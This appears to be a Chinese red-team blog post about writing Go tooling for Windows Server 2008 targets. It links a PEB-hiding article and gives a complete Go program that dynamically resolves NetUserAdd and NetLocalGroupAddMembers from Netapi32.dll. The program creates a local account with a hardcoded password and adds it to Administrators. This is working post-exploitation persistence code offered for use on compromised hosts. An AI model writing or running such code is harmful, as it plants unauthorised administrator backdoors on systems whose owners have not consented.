首发于知识星球
需要注意的是
最后还要注意Go版本问题,因为在实战中2008很多,如果你使用Go编译高版本是不支持这些版本运行的,最后一个支持windows低版本运行syscall这些的编译器是Go 1.10.8.
Go高版本编译器编译的Frp是可以在2008运行的.
这里用的学习资料是lengyil师傅的文章(RedTeam Tips-PEB隐藏)
https://mp.weixin.qq.com/s/UM-RlHX6mTo-lfANHbs7sQ
具体的调用顺序为:LoadLibrary->GetProcAddress->Syscall9
最后是一个添加用户的demo
//author:YanMu
package main
import (
"syscall"
"unsafe"
)
type (
DWORD uint32
LPWSTR uintptr
)
const (
USER_PRIV_USER = 1
UF_SCRIPT = 0x0001
NERR_Success = 0
)
type USER_INFO_1 struct {
usri1_name LPWSTR
usri_password LPWSTR
usri1_password_age DWORD
usri1_priv DWORD
usri1_home_dir LPWSTR
usri1_comment LPWSTR
usri1_flags DWORD
usri1_script_path LPWSTR
}
type _LOCALGROUP_USERS_INFO_0 struct {
lgrui0_name LPWSTR
}
var (
Netapi32, _ = syscall.LoadLibrary("Netapi32.dll")
NetUserAdd, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetUserAdd")
NetLocalGroupAddMembers, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetLocalGroupAddMembers")
dwError DWORD = 0
user USER_INFO_1 = USER_INFO_1{}
account _LOCALGROUP_USERS_INFO_0 = _LOCALGROUP_USERS_INFO_0{}
)
func add_user_To_the_admin_group() {
user.usri1_name = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("test57")))
user.usri_password = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("P@sss!111")))
user.usri1_priv = USER_PRIV_USER
user.usri1_flags = UF_SCRIPT
if a, _, _ := syscall.Syscall6(NetUserAdd, 4, 0, 1, uintptr(unsafe.Pointer(&user)), uintptr(dwError), 0, 0); a == 0 {
println("添加用户成功!")
} else {
println("添加用户失败")
}
account.lgrui0_name = user.usri1_name
var admin_group LPWSTR
admin_group = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("Administrators")))
if d, _, _ := syscall.Syscall6(NetLocalGroupAddMembers, 5, 0, uintptr(admin_group), 3, uintptr(unsafe.Pointer(&account)), 1, 0); d == NERR_Success {
println("添加用户到管理员组成功!")
} else {
println("添加用户到管理员组失败")
}
defer func() {
syscall.FreeLibrary(Netapi32)
}()
}
func main() {
add_user_To_the_admin_group()
}